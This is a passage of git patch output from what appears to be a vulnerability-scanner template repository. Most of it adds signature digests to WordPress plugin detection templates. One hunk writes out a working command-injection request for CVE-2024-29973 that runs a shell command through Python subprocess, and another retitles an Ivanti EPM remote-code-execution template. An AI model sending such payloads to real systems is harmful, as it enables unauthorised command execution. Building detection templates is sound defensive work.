4a0a00473045022100cbfb1e2b46b9216734e708c68c0f3821413c7db191594871089db73925277cbd02203a374f4ae854b15bbef30918aac8b518916607dcec7f06eac3534c3b7a569d5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..11c551a383 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022055eec176b1bd3ffcf4b72f4e63888589a1d75c080d11e649b76d817eecc3a636022100a6c06f0347bd33e54ba5e2aade27cdaade46675fdd033f85f762711176c62b23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..cd15ea8d8d 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022052bf0d9334b853aa1f9bf29be1337b1f3bdbc92bb16a122583d4531994a381c1022100b470c64e75877ed4aa9f788be9cf4c916d16d1669dd5bc718fec3eaf43b6b6d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..1854c1c96e 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b1cae3ac4cca68105e1746d1b4d2cd0b6f81367ff54e666046dab46844da715c02201412d3db81494a46a9286f307bf564a9d9d7674a9b1106e56d3da6e8ba3dace2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..0b68af503b 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205b819f582e9fa174b7c5251b63ef149c257c3ae7d623f0c28e6d4565a25e05b20221008b62d9fb4d1256cea7a9aa59b16231232b8421eacd02d6c0f8aa72f8ad77dbe1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..6dbabef767 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ba1c1166a3197b98ab8f09001db33e7d2a601d7f1c061ec60661d64a78268e1802201b3848eaaf424f4a182c15f817b6a643329aee21a783031a5e858a4b979e4d7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 1fd49d2e08..ba9d01fbaa 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d029f4b2152ccb528b01bfbe7bc2ee6d54d107d2b22ee5e4073e086ed3c122ae0221008889884675f66abfc9ee66e51a7e749a183f925dc0f03b171446ffacc1bd15d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..43a3cc4fbd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220125e234a08aaca9f04784503ae8adccb17d2e3d473abcd352bd7837395be4b610220767666127e439e8e44935901cdf9e26162598d5996a111c7070a6207ba2f5649:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..fffff49819 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d9eaa9bfb917286e69a299c186ab3212aa0bc88aa28651d8f39e5760742069d2022100877ba78f6de94d68bfda45147770940f68e466c5eb46e0571bea92f70c171d0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..30f745ffd3 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220704ec539accaf7f89e27efceda95dbd88000512c97a4d4956b68957cbcd1c189022014a47c1bc993b4d63bd3f58308ef41e42dfcc65be74d17683944a9e8c72a5cc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..fa45bb5bd6 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202e8334cf4e5710ff7c62102abb8af0b05fba2f24230b42ccdc122e15c799944c022009a960c67e58d5207e6e2187519fb752d49037935dbfe25c19d66ed24c7c7c17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..30fec6bb3d 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207e13fff57affc0743ba4c0a9b9c994c5f35880f11dd153893a2fe226437046550221009822da8cfd854be2947f9cb88dc135f63d9741c8cb5930533e4c38a2f13d8adb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..d37278f20a 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022009a70d78ef7f9292fa6dbee21078066833b9ab2e9dcfc1253f32d0762a17cee3022032617f6949d27569009290b9375e75ae4d750cf2525d54c17f16436535508901:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..ff9b10cf45 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202ee57ce58f4a2c3e738f3d9fe041f4dc02ef1d65784e47436817c5413c3f4e9a022036a5158aeadd606c4f813ceb91eebd4630b510024fd6d84b0107c8d566fb4bb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..8fd8608266 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022023d0d1ac67555f7d0561571ce75fd684f4f2c4da98aabaa12976671764f44f8e022100f119014442efed2007546e4811c21c57282aa5c2374027ed1101fa73405c1207:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..3c0ec7d455 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022039b584d503acf77a3d493833b3015533635d31e9e87e9591c9334056504107b2022100d917f3aa16ade9f5051130e5ff6d9302fab4ff905088670e7d11274c4528a527:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..4720d9ff1c 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100866281089fb1c9cc73e2cc5b8e1b0b31ac21297182e5d51913cd7f89d440d0740221009a178659851a541d43f78df3fbd2d3e42a6b2d8e304eb8066ac1c06123bbbc7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..5a7e452c54 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022043aa45a5841ce7c4a9add2d9261ce58818fcb69edfe1ddb43958a0fd8d8103d4022100c73844b04e2f6df49c0b7bc229ba22f64b536546077ad306b5c0daf0e794b086:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..ba116942b5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d28058b7a9d9d525c0bef3e50dc830826e3361ac0e4698f461eced0e01bf917b022100da16d6434aec37f2dc5d2e66f4b58d5fed0c97bada94b4722763cff169a25fd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..6a9188d9af 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206ccd6f6e6a0c7a39bf6a9b7106c5842e190d88487e6e97cfcca1d35cffae1e81022100ef2c85e6dfe8cc154ff42f4094de12e61f4207eaf27133a0f82ab93b040bbc84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..4e6d35b706 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207a8d741bfddc69446745669c5d6bb49d796e0061350e87a2b2895fb7df3e1f9302205a691f370f7dd490a4173724dc95ec92e1b37c36c1831a32d73353835114c850:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..3b2da021b0 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dc66cd422f0d912657a8c43b01c30572452caf99d1082ffb9e7443bb44318bc302203be197211801983135c21f502fbf0094d0df135e1197dc020aa6662b68ec4647:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 34115bcd0f..cc5197bc3f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220141f543468eb777d045955d62707b1a2401c08c93bac002fcd3663628322a033022100a62647d5e1b3873b826837e2a4c059db474f8fddac8f1fcea6ef2435c90933f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..ad24354d3a 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220531d98196fbf83034671b7e35591dcf10a6c3554e565d29c44901928557b69a70220656cf4950b5e91de98ab737d1c33c6c215917ecf65ebabc7483f47cab9cf6229:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..5ee25f5c14 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d0a36259fca36469842fbea8ee6166c39f6014d2ca515aab925bdba827ca794c022100e6a55de6e2f63a7cd000dc0a243da5f5e25762184eb8d0faad8e0fd80872bb62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 56dfdf4a59..a5d1509568 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022064aa055c9fca5632700f9dd3d92627a2c0cb6a4ac5219b8e9597f4db042a4707022100e941f04eea535304a0b0173f44c32def885d2c7372e82777c5054c6c72392728:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index c3ec4ebd80..c831ba3cb9 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f5be215787140c1b263b6a6ad7b51eae21f8fd18b132c20501044dafc8a8e23b0220037c35ff81e49654d1b25a6e7349bdac37e7939cfdd6f3fb397ce1752dddcb82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 2276545093..3b87f339b3 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204a5a39994c472bf3a48441cc86d79fc575fc2c29d9fc36467692f83f1a82682b022100da8af0467ee5fe40d2e8296df0ac693db5ac189490df37aeef1b42717b4f5245:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..fa04af966a 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fe1dcf4feb0bc8f3b677567eca90de6543b6c9acc89ab03e11b02126f6411d08022100c5480d233b3ab77b4cda7a528a3d6e140fe309b3c29fb9df3e31ba4ecb764f99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 7b28bf7020..c7206f278a 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204c73d83408a950b529a260878cc134d8f080b1b948700831a5945366cd90ffc00220622ef4d82ea6680aa16801bcab89ea862395d928cb2a85c20b49fe70e8898609:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index da6abc2a81..71ce8df018 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e150045f4acb9f70ec52c1f2ad3ef2950a661e85cea28c77f837bfc3ddfe52500220183e4b315bda395c6c4d23b248a2ea2b539c1242cd3083422624fd6158555679:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..3553b349e0 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207ed5183942c3a5a7a6a2d9b47221e037e29470f95db6cb589a0d2e935e235eb00220547b4d617c2cb263f46f7f0ab072824ca647612fd97e4ee8342ddfd2b67818cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..2966067686 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009aea4c22b43d840738b7118888c5e51364be5c1d69389a015e13960a7221905d02206e989b73861efc7777e1cf3a4f8eba34fdb6e56afe3ce1f4983ee74c92a0be7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..267830df01 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a8d67b168861dd91faa01377fa81880ff8940d0028e03627ff401db59a36460202201ee890ce59676c72df46fc0c07a0c498dfa9fd08f9649131a677adb31499f861:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..afbd611c0b 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200551cdb6ba572a6bd1ae166d70d4371311ebbf4c10b2a11476dc8797f9e2be4e02207f44474716f1922b954ad222c4d873579ec0b1fab584bd7f7e31556671fa1610:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..97dd565f7f 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eaa0560e84a18b3284992fc27cd22ba56337b06a01a42b65d908cf56bc4b14bb022076d6102ab2417d78ffcd27c8876f81f92e848472aba77fab0722e5d11b794c31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..7048a60f56 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009d224678b59da2de95683270709f318411e5dc2225d30ea14a3e68272b17ef74022100ec683274251ead407094e0b9cce75ccf08d5ea49d47babbff9f2beb43a5ec11b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..e73c97cd9f 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f80cf3ff9b2c1c7741b8c8f0475790c97bbdf9104645c6d6d7a701e387c6cdd1022033f930219b55d1a474cdcc20963f0e9f883cc6a7ef8df7ec168fed396b62ce48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From df08b05d0beb5ae3feab76da05bbb4b97bb53eb9 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 19 Jun 2024 06:51:31 +0000 Subject: [PATCH 0400/1841] Auto Generated New Template Addition List [Wed Jun 19 06:51:30 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ac56c219b5..6d6e7a3f66 100644 --- a/.new-additions +++ b/.new-additions @@ -17,6 +17,7 @@ http/cves/2024/CVE-2024-0250.yaml http/cves/2024/CVE-2024-0939.yaml http/cves/2024/CVE-2024-1728.yaml http/cves/2024/CVE-2024-23692.yaml +http/cves/2024/CVE-2024-24112.yaml http/cves/2024/CVE-2024-2621.yaml http/cves/2024/CVE-2024-27718.yaml http/cves/2024/CVE-2024-28995.yaml From 39891ed558c897e01de4dd66525e73cd54dd5109 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 19 Jun 2024 06:52:03 +0000 Subject: [PATCH 0401/1841] Auto Generated New Template Addition List [Wed Jun 19 06:52:03 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6d6e7a3f66..a28040eb41 100644 --- a/.new-additions +++ b/.new-additions @@ -18,6 +18,7 @@ http/cves/2024/CVE-2024-0939.yaml http/cves/2024/CVE-2024-1728.yaml http/cves/2024/CVE-2024-23692.yaml http/cves/2024/CVE-2024-24112.yaml +http/cves/2024/CVE-2024-24565.yaml http/cves/2024/CVE-2024-2621.yaml http/cves/2024/CVE-2024-27718.yaml http/cves/2024/CVE-2024-28995.yaml From 5dec0a4cff44d610f3a75859d66a984e44cab210 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 19 Jun 2024 06:52:16 +0000 Subject: [PATCH 0402/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 7a9c7a7cf3..90aeb175d5 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -22,6 +22,7 @@ on: - 'http/cves/2024/CVE-2024-0939.yaml' - 'http/cves/2024/CVE-2024-1728.yaml' - 'http/cves/2024/CVE-2024-23692.yaml' + - 'http/cves/2024/CVE-2024-24112.yaml' - 'http/cves/2024/CVE-2024-2621.yaml' - 'http/cves/2024/CVE-2024-27718.yaml' - 'http/cves/2024/CVE-2024-28995.yaml' From 2462bb22374b176043ffbf2d70113a07e7db313c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 19 Jun 2024 06:53:15 +0000 Subject: [PATCH 0403/1841] Auto Template Signing [Wed Jun 19 06:53:15 UTC 2024] :robot: --- http/cves/2024/CVE-2024-24112.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-24112.yaml b/http/cves/2024/CVE-2024-24112.yaml index fec098c74f..8fe9dccd5f 100644 --- a/http/cves/2024/CVE-2024-24112.yaml +++ b/http/cves/2024/CVE-2024-24112.yaml @@ -46,3 +46,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502206ee591f6526c505d3b381cb58780dc1fcb46e53b5dc7e93c2a0b985bd36d60a5022100a210d4b431aa1440c9b5e92ac4427367d078ea2a0591b4a7e183f7ba94aa5339:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 6f52cb240464fa2fadf583a48468e08effd13aa0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 19 Jun 2024 13:20:03 +0530 Subject: [PATCH 0404/1841] fix typo --- http/cves/2024/CVE-2024-29973.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-29973.yaml b/http/cves/2024/CVE-2024-29973.yaml index 1f5da07afe..ecbdee44a7 100644 --- a/http/cves/2024/CVE-2024-29973.yaml +++ b/http/cves/2024/CVE-2024-29973.yaml @@ -27,7 +27,7 @@ info: http: - raw: - | - GET /cmd,/simZysh/register_main/setCookie?c0=’storage_ext_cgi+CGIGetExtStoInfo+and+False+or+_import_("subprocess").check_output("id",+shell=True)%23 HTTP/1.1 + GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+and+False+or+_import_("subprocess").check_output("id",+shell=True)%23 HTTP/1.1 Host: {{Hostname}} matchers-condition: and From db35fcb80d8fc92f3208c7c44e7f236cc4d5fca8 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 19 Jun 2024 13:52:18 +0530 Subject: [PATCH 0405/1841] Update CVE-2024-29824.yaml --- http/cves/2024/CVE-2024-29824.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-29824.yaml b/http/cves/2024/CVE-2024-29824.yaml index 54bbdb14e8..fc1842ad87 100644 --- a/http/cves/2024/CVE-2024-29824.yaml +++ b/http/cves/2024/CVE-2024-29824.yaml @@ -1,7 +1,7 @@ id: CVE-2024-29824 info: - name: Ivanti EPM SQL Remote Code Execution via SQL Injection + name: Ivanti EPM - Remote Code Execution author: DhiyaneshDK severity: critical description: | @@ -15,6 +15,8 @@ info: cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.6 cve-id: CVE-2024-29824 + metadata: + max-request: 1 tags: cve,cve2024,ivanti,epm,sqli,rce http: From b84a4bd7e2c793a2318b4211edcad96bdc1ee489 Mon Sep 17 00:00:00 